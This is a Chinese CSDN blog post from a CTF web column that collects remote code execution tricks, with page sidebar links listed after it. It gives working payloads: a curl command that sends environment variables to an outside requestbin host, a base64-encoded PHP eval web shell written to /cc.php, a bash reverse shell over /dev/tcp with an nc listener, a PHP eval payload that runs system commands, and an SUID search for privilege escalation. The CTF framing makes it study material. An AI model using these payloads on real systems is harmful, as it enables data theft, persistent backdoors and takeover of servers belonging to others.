记录一些远程RCE姿势

最新推荐文章于 2024-07-25 11:33:48 发布
最新推荐文章于 2024-07-25 11:33:48 发布
阅读量64 收藏
点赞数
分类专栏: ctf_web 文章标签: linux vim bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RuiLike/article/details/130750098
版权

linux: 

#远程rce无回显时:
利用题目服务器向该网站发送请求(http://http.requestbin.buuoj.cn)可以记录下信息
#example:
curl -X POST -d "fizz=`env`" http://http.requestbin.buuoj.cn/1k26kqs1
服务器将本地环境变量里的值发送到了该网站
#将PHP文件写入根目录下,利用蚁剑连接
<?php eval($_POST[cc]);?>
base64:PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==

echo "PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==" | base64 -d >/cc.php
--------------------------------------------------------------------------------------
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=echo "PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==" | base64 -d >/cc.php

 

#linux反弹shell
bash -c \"bash -i >& /dev/tcp/ip/7777 0>&1\"
#在自己的linux上监听
nc -lvp 7777

php: 

#无参数rce
eval(end(current(get_defined_vars())));&flag=system('nl /*f*')
//获取自己定义的flag变量,利用eval执行
get_defined_vars():获得所有变量返回多维数组
current():获取当前数组指针指向的元素
end():获取数组最后一个元素
------------------------------------------------------------------------------------
//若某文件无权限访问,则利用suid提权复制文件到标准输出
eval(end(current(get_defined_vars())));&flag=system('cp "文件路径" /dev/stdout');
//具有suid权限的可执行文件
nmap;vim;find;bash;more;less;nano;cp;awk

find / -user root -perm -4000 -print 2>/dev/null
//查找具有suid权限的文件

RuiLike
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微信远程rce poc
04-18
微信远程rce poc
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
rce-bug2.0:漏洞记录
03-18
突破感知项目主要帮助大家记录一些重大突破突破方面的细节 为了方便大家高效率的整理突破与利用 创立突破感知项目 进攻感知流程 对一个进攻情报>>收集进攻信息>>进攻复现>>进攻信息整理 进攻追踪流程 对一个进攻情报...
Apache Flink 未授权访问+远程代码执行.pdf
04-30
Apache Flink 未授权访问+远程代码执行.pdf,该漏洞可以上传任意Jar包导致远程代码执行
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
Linux:基础命令学习
qq_55038440的博客
07-20 1511
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
LINUX之MMC子系统分析
gy794627991的博客
07-23 1102
MMC子系统从协议到源码分析
RockyLinux 9 PXE Server bios+uefi 自动化部署 RockLinux 8 9
极致,细节
07-24 115
PXE(Preboot eXecution Environment,预启动执行环境)是一种网络启动协议,允许计算机通过网络启动而不是使用本地硬盘。PXE服务器是实现这一功能的服务器,它提供了启动镜像和引导加载程序,使得客户端计算机可以通过网络启动并安装操作系统或运行其他软件。
(leetcode学习)110. 平衡二叉树
m0_54888411的博客
07-24 379
很久没写结构体了,复习一下。学习二叉树的通用解题方法。给定一个二叉树,判断它是否是。
Linux:进程信号(一.认识信号、信号的产生及深层理解、Term与Core)
qq_74415153的博客
07-23 1559
1.认识信号 进程看待信号方式 2.信号的产生 2.1信号的处理的方式 --- signal()函数 2.2kil指令产生信号 2.3键盘产生信号 2.4系统调用发送信号 -kil系统调 用、raise()和abort()库函数 2.5软件条件产生信号 2.6异常产生信号 3.信号产生的深层理解 键盘产生信号 异常产生信号 4.Term与Core core文件
Linux中将文件解压到指定目录
weixin_61663117的博客
07-23 354
请确保目标目录已经存在,否则上述命令可能会报错。如果目录不存在,你可以使用。通常是用来压缩单个文件的,而不是目录。所以你需要指定解压后的文件名。选项会创建所有必要的父目录。是你想要解压到的目标目录。选项后面跟着的是目标目录。通常用于压缩单个文件。
Linux——DNS服务搭建
ln2915275834的博客
07-23 886
要求能够ping通外网,有yum源。
linux离线安装mysql8(单机版)
八月林城的博客
07-24 840
mysql单机安装以及解决安装初始化过程中遇到的问题
【嵌入式开发 Linux 常用命令系列 7.7 -- find 和 sed 配合使用介绍】
CodingCos的博客
07-24 514
命令将文件中所有"demo" 字符串替换为 “hello”
计算机技术基础 (bat 批处理)Note4
weixin_46530456的博客
07-23 994
本节主要讲解一些 bat 批处理文件中的一些特殊符号,包括和>>和&&和||" ";()
linux 部署flask项目
weixin_41934979的博客
07-23 568
创建.ini配置文件或者.conf配置文件(具体要看[include]下面路径是*.ini,还是*.conf),注意不同版本的Linux系统,不同版本supervisor,配置文件路径可能不同。放进/etc/supervisor/conf.d路径里。查看版本,确认supervisor是否成功安装。文件要放进 [include]下的文件路径里。文件要放进:[include]下的文件路径里,查看supervisor的配置。启动supervisor服务。再次提醒.conf配置文件,这里以Ubuntu为例。
【linux】Shell脚本三剑客之grep和egrep命令的详细用法攻略
最新发布
景天科技苑
07-25 2485
在Linux和Unix系统中,grep(Global Regular Expression Print)是一个非常强大的文本搜索工具,能够根据用户指定的模式(由正则表达式和文本字符组合而成)对目标文件进行逐行搜索,并显示匹配到的行。而egrep(Extended Grep)则是`grep`的扩展版本,支持更多的正则表达式语法。尽管egrep在较新的系统中被`grep -E`选项所取代,但了解其用法对于理解和使用正则表达式仍然具有重要意义。
paraFoam 运行 报错 usr/lib/x86_64-linux-gnu/libQt5Core.so 已解决
PHP代码的博客
07-24 247
完美解决,并且能正常打开,前提是,有gui视图。使用远程桌面,才能使用。或者 其他远程软件!比如 tightvncserver也是可以的!使用ubuntu 视图开发的时候。报错 缺少 libQt5Core 核心组件。
Linux_实现TCP网络通信
安权_code的博客
07-24 814
在Linux下,实现传输层协议为TCP的套接字进行网络通信,网络层协议为IPv4,需要用到的接口如下:实现服务器的接口有(socket、bind、listen、accept、read、write),实现客户端的接口有(socket、connect、write、read)。 实现方式:因为网络通信的本质是进程间通信在云服务器上创建一个服务器进程和一个客户端进程,服务器进程先启动,然后让客户端链接到服务器上,至此客户端可以向服务器发送消息,并且服务器收到消息后可以给对方反馈信息。
远程代码执行漏洞RCE原理
03-28
远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者通过利用程序或系统中的漏洞,成功地在远程主机上执行自己编写或者上传的恶意代码。攻击者可以利用这个漏洞执行系统命令、上传或下载文件、获取敏感信息等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值